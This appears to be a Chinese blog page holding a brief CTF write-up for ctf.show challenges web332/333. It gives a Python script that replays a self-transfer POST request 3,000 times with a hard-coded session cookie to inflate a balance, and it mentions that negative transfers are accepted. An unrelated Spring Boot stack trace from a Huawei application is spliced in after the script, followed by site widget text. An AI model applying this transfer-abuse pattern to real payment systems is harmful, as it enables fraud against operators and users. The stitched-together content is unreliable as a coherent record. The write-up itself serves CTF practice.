web332,333

利用转账漏洞获取CTF挑战flag,
代码片段展示了尝试通过发送POST请求到特定URL来模拟给自己转账的过程,其中群主提到可以转负数的账。这可能是一个CTF(CaptureTheFlag)比赛中的安全漏洞挑战,目标可能是通过非法转账操作获取flag。

给自己疯狂转账就能买flag了

PS:332群主说可以转负数的账

import requests
import json

if __name__ == '__main__':
    #cookie = "PHPSESSID=abfirn2d40bsooodd2su5ebr5n"
    cookies = {'PHPSESSID': '3f4tqs9kb3q4kpubjp2n1l3nj8'}
    url='http://61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show/api/amount.php'
    header = {
        'POST': '/api/amount.php HTTP/1.1',
        'Host':'61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show',
        'User-Agent':'Mozilla / 5.0(WindowsNT10.0;Win64;x64;rv: 109.0) Gecko / 20100101Firefox / 110.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding':'gzip, deflate',
        'Referer':'http://61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show/transfer.php',
        'Content-Type':'application/x-www-form-urlencoded',
        'Content-Length':'8',
        'Origin': 'http://61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show',
        'Connection':'keep-alive',
        'Cookie': 'PHPSESSID=3f4tqs9kb3q4kpubjp2n1l3nj8',
        'Upgrade-Insecure-Requests':'1'
    }
    # 发送
    post_dict = {'u': 'xm', 'a': '1000'}
    post_json = json.dumps({'some': 'data'})
    for i in range(1,3000):
        r3 = requests.post(url=url, data=post_dict, headers=header, cookies=cookies)
        print("r3返回的内容为-->" + r3.text)

springframework.beans.factory.BeanCreationException: Error creating bean with name 'requestMappingHandlerMapping' defined in class path resource [org/springframework/boot/autoconfigure/web/servlet/WebMvcAutoConfiguration$EnableWebMvcConfiguration.class]: Invocation of init method failed; nested exception is java.lang.IllegalStateException: Ambiguous mapping. Cannot map 'taskCenterController' method com.huawei.SCLC_WEBNEW.controller.taskCenter.TaskCenterController#qryExecutingByUserId(String) to { [/taskCenter/qryExecuting]}: There is already 'taskCenterController' bean method com.huawei.SCLC_WEBNEW.controller.taskCenter.TaskCenterController#qryUnExecutedByUserId(String) mapped. at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1804) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:620) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.DefaultListableBeanFactory.preInstantiateSingletons(DefaultListableBeanFactory.java:955) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.context.support.AbstractApplicationContext.finishBeanFactoryInitialization(AbstractApplicationContext.java:920) ~[spring-context-5.3.27.jar:5.3.27] at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:583) ~[spring-context-5.3.27.jar:5.3.27] at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.refresh(ServletWebServerApplicationContext.java:145) ~[spring-boot-2.5.15.jar:2.5.15] at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:780) [spring-boot-2.5.15.jar:2.5.15] at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:453) [spring-boot-2.5.15.jar:2.5.15] at org.springframework.boot.SpringApplication.run(SpringApplication.java:343) [spring-boot-2.5.15.jar:2.5.15] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1370) [spring-boot-2.5.15.jar:2.5.15] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1359) [spring-boot-2.5.15.jar:2.5.15] at com.huawei.SCLC_WEBNEW.AppStart.main(AppStart.java:16) [classes/:na] Caused by: java.lang.IllegalStateException: Ambiguous mapping. Cannot map 'taskCenterController' method com.huawei.SCLC_WEBNEW.controller.taskCenter.TaskCenterController#qryExecutingByUserId(String) to { [/taskCenter/qryExecuting]}: There is already 'taskCenterController' bean method com.huawei.SCLC_WEBNEW.controller.taskCenter.TaskCenterController#qryUnExecutedByUserId(String) mapped. at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry.validateMethodMapping(AbstractHandlerMethodMapping.java:669) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry.register(AbstractHandlerMethodMapping.java:635) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.registerHandlerMethod(AbstractHandlerMethodMapping.java:332) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping.registerHandlerMethod(RequestMappingHandlerMapping.java:420) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping.registerHandlerMethod(RequestMappingHandlerMapping.java:76) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.lambda$detectHandlerMethods$2(AbstractHandlerMethodMapping.java:299) ~[spring-webmvc-5.3.27.jar:5.3.27] at java.util.LinkedHashMap.forEach(LinkedHashMap.java:684) ~[na:1.8.0_261] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.detectHandlerMethods(AbstractHandlerMethodMapping.java:297) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.processCandidateBean(AbstractHandlerMethodMapping.java:266) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.initHandlerMethods(AbstractHandlerMethodMapping.java:225) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.afterPropertiesSet(AbstractHandlerMethodMapping.java:213) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping.afterPropertiesSet(RequestMappingHandlerMapping.java:205) ~[spring-webmvc-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.invokeInitMethods(AbstractAutowireCapableBeanFactory.java:1863) ~[spring-beans-5.3.27.jar:5.3.27] at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1800) ~[spring-beans-5.3.27.jar:5.3.27] ... 16 common frames omitted
06-18
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值